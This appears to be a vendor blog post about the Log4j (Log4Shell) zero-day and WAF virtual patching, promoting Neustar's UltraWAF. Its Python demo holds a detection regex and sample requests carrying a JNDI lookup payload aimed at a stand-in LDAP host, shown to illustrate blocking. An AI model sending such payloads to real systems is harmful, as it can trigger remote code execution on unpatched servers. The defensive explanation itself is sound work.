When Facing a Zero-Day Threat, A Good WAF Can Be Your Best Friend

Late last year, a new Zero-Day vulnerability was announced in the Apache Log4j logging system that could allow arbitrary code execution on unpatched systems. Apache Log4j is a popular logging utility, so the pool of potentially vulnerable systems is large. The news of the Zero-Day threat sent CISOs, security teams, and application teams around the globe into a frenzy of activity: taking inventory of their internet-facing systems, checking for Log4j, checking revision levels, and putting emergency patching into effect. Many organizations took the appropriate proactive step of reaching out to business partners and vendors to assess their potential exposure there as well. The timing of the announcement was challenging. Most organizations found out about the exposure on Friday, December 10th, during the Judeo-Christian holiday season, when many people are taking personal time off and networks and applications are entering change moratoriums. That makes the effort of remediation that much more of a challenge.

The good news is that for companies that have deployed Web Application Firewall (WAF) technology, or that contract WAF functions from their cloud security vendors, there is likely to be a quick and easy answer to the Zero-Day threat: virtual patching. Virtual patching is a function that exists on many WAF solutions and makes potential attackers see your applications as not vulnerable to the threat. WAF solutions are deployed in-line with web application traffic and act as reverse proxies between the application's clients and the origin servers. The WAF terminates the connection with the client, ensures that the client is not performing any malicious actions, and then creates a separate connection to the server, bridging data between the two. Because it terminates the client traffic, the WAF can act on behalf of the origin server and cover for vulnerabilities that exist on the server; virtual patching is one of the ways this is done. When a new vulnerability (CVE) is published, a signature specific to that vulnerability is published to the WAF. Once enabled, the WAF looks for the specific traffic that would trigger the vulnerability and blocks it. IT and security teams can turn on virtual patching for a specific vulnerability as soon as the signature is published, and this protects all the servers behind the WAF until the team can patch them. This greatly reduces the urgency and operational impact of Zero-Day attacks. Many WAF vendors also receive prior notice of a pending vulnerability announcement, so they can craft a signature that is available as soon as, or shortly after, the vulnerability is announced.
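To make the flow above concrete, here is a toy model of a WAF applying a virtual patch, written for this post and not UltraWAF's code: a signature keyed by CVE is matched against every field of a terminated client request before the request is forwarded to the origin. The regex is a simplified form of the widely published Log4Shell detection pattern, and the requests are constructed samples.

```python
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional, Tuple
from urllib.parse import unquote

@dataclass
class Signature:
    cve: str                # CVE the virtual patch covers
    pattern: "re.Pattern"   # traffic that would trigger the vulnerability
    action: str = "BLOCK"   # action applied on a match

@dataclass
class Request:
    path: str
    headers: Dict[str, str] = field(default_factory=dict)
    body: str = ""

# Virtual-patch registry. The pattern is a simplified, publicly documented
# detection for Log4Shell (the JNDI lookup token); vendor rules go further.
SIGNATURES: List[Signature] = [
    Signature("CVE-2021-44228", re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)),
]

def inspect(req: Request) -> Tuple[str, Optional[str]]:
    """Return ("BLOCK", cve) if an enabled signature matches any request
    field, otherwise ("ALLOW", None)."""
    fields = [req.path, req.body, *req.headers.keys(), *req.headers.values()]
    for sig in SIGNATURES:
        # Percent-decode twice so an encoded field is inspected in decoded
        # form; matching only the raw bytes would miss it.
        if any(sig.pattern.search(unquote(unquote(f))) for f in fields):
            return sig.action, sig.cve
    return "ALLOW", None

def proxy(req: Request) -> str:
    """Reverse-proxy step: terminate the client request, inspect it, and only
    then forward it to the origin over a separate connection."""
    action, cve = inspect(req)
    if action == "BLOCK":
        return f"403 Forbidden (virtual patch {cve})"   # constructed response
    return f"200 OK from origin for {req.path}"         # stand-in origin

if __name__ == "__main__":
    # Constructed samples: benign, lookup token in a header, same token encoded.
    for req in [
        Request("/index.html", {"User-Agent": "Mozilla/5.0"}),
        Request("/", {"User-Agent": "${jndi:ldap://example.invalid/x}"}),
        Request("/?q=%24%7Bjndi%3Aldap%3A%2F%2Fexample.invalid%2Fx%7D"),
    ]:
        print(proxy(req))
```

Only the encoded and plain forms of one token are covered here; a production signature also has to deal with nested lookups and other encodings, which is why teams rely on the vendor's rule rather than writing their own.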

I’m pleased to report that Neustar Security Services’ (NSS) UltraWAF cloud-based WAF solution had a signature available shortly after the vulnerability was announced. Customers of UltraWAF can search for the signature by CVE and apply it with a BLOCK action, ensuring that all your potentially exposed servers are protected. The NSS UltraWAF solution is fully hosted in the cloud and can protect assets deployed on-premises, in the cloud, in multi-cloud, and in hybrid environments, making it an easy option for gaining comprehensive protection. You can find more information about how UltraWAF can help protect your internet-facing web applications here. To speak to an NSS UltraWAF expert, please contact us.

Figure 1: CVE-2021-44228 in the UltraWAF portal